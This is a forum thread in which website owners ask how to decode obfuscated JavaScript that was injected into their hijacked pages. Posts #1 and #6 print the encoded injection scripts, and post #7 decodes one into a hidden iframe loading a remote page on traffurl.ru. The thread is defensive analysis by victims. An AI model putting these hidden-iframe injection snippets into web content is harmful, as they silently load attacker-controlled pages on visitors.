By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
428,659 Members | 940 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 428,659 IT Pros & Developers. It's quick & easy.

How to decode obfuscated JavaScript

P: 3
I have no knowledge of programming... I can usually look through a script though and figure out what the idea is.

Recently several of my sites got hijacked and below is the code that was inserted, what I'm trying to do is to decode it to figure out what it's intent was and to see if it opened up any other holes in the server that I need to know about.

Maybe this is easy stuff... but I don't have a clue where to start ...

Expand|Select|Wrap|Line Numbers
  1. <script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
  2.  
any help would be greatly appreciated.

TIA.
Sep 18 '07 #1
Share this Question
Share on Google+
10 Replies


pbmods
Expert 5K+
P: 5,821
Heya, KyredBone. Welcome to TSDN!

Have a look at this thread.
Sep 18 '07 #2

P: 3
Ok... I looked at that and created a test.php on my server... I see the text box but it is empty... I'm guessing I've done something wrong... how much or what portion exactly do I need to put in

Expand|Select|Wrap|Line Numbers
  1. document.getElementById("test").value = unescape('code goes here')
  2.  
and also do I need the " ' " around the code goes here ?
Sep 19 '07 #3

P: 3
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.

http://www.netdemon.net/haywyre/
Sep 19 '07 #4

acoder
Expert Mod 15k+
P: 16,027
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.

http://www.netdemon.net/haywyre/
That thread dealt with a simple escaped string. Yours is a bit more complicated. That's why it wouldn't work.
Sep 19 '07 #5

P: 5
Can anyone tell me about how to decode this script:

<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u 0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u00 75\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e \u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u 0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u00 20\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031 \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u 0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u00 74\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e \u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u 006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u00 74\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e');
</script>

I encountered this on a friends page and removed it. I know it is associated with traffurl.ru. my "noscript" add on for Firefox blocked the site when I went to his web site which was how I figured out it was in his page but I cannot figure out a way to decode it to see what it is doing. Any help?
May 28 '08 #6

rnd me
Expert 100+
P: 427
[PHP]
<iframe src="http://traffurl.ru/sliv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

[/PHP]
May 28 '08 #7

acoder
Expert Mod 15k+
P: 16,027
Can anyone tell me about how to decode this script:
You've got the decoded version as posted by rnd me, but if you want to decode it yourself, here's a very easy way: replace the document.write with an alert.
May 29 '08 #8

P: 1
Anyone can help me to decode this scripts?

Expand|Select|Wrap|Line Numbers
  1. dw_Inf.gw=dw_Inf.fn("\x77\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
Expand|Select|Wrap|Line Numbers
  1. dw_Inf.mg=dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x65\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x61\x72\x29');
Expand|Select|Wrap|Line Numbers
  1. dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65');
Expand|Select|Wrap|Line Numbers
  1. dw_Inf.x0=function(){dw_Inf.fn('\x69\x66\x28\x21\x28\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x64\x79\x6e\x2d\x77\x65\x62\x2e\x63\x6f\x6d\x22\x29\x21\x3d\x2d\x31\x29\x29\x61\x6c\x65\x72\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x6d\x67\x29\x3b');dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');dw_Inf.fn('\x64\x77\x5f\x73\x63\x72\x6f\x6c\x6c\x65\x72\x73\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');};
Expand|Select|Wrap|Line Numbers
  1. dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x78\x30\x28\x29\x3b');

Thanks advanced for all helps!!
Jun 25 '08 #9

acoder
Expert Mod 15k+
P: 16,027
First of all, welcome to Bytes!

What you can do is wrap those statements in strings and use document.write or alert to display. Those code snippets show as:
Expand|Select|Wrap|Line Numbers
  1. dw_Inf.gw=dw_Inf.fn("window.location");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
  2. dw_Inf.mg=dw_Inf.fn('dw_Inf.get(dw_Inf.ar)');
  3. dw_Inf.fn('dw_Inf.gw=dw_Inf.gw.hostname');
  4. dw_Inf.x0=function(){dw_Inf.fn('if(!(dw_Inf.gw==""||dw_Inf.gw=="127.0.0.1"||dw_Inf.gw=="localhost"||dw_Inf.gw.indexOf("dyn-web.com")!=-1))alert(dw_Inf.mg);');dw_Inf.fn('dw_Inf.ready=true;');dw_Inf.fn('dw_scrollers.ready=true;');};
  5. dw_Inf.fn('dw_Inf.x0();'); 
Jun 25 '08 #10

P: 1
Hello Guys,

I have solved your problems - i have made a little tool in vb.net to decode and encode again - below you can find the link where u can see the video also how to use it.

adeelnokiastuffs.blogspot.com/2010/08/javascript-hexa-codes-decoder-and.html

if anything please email me at adeel.rizvi at yda.net.au
Aug 9 '10 #11

Post your reply

Sign in to post your reply or Sign up for a free account.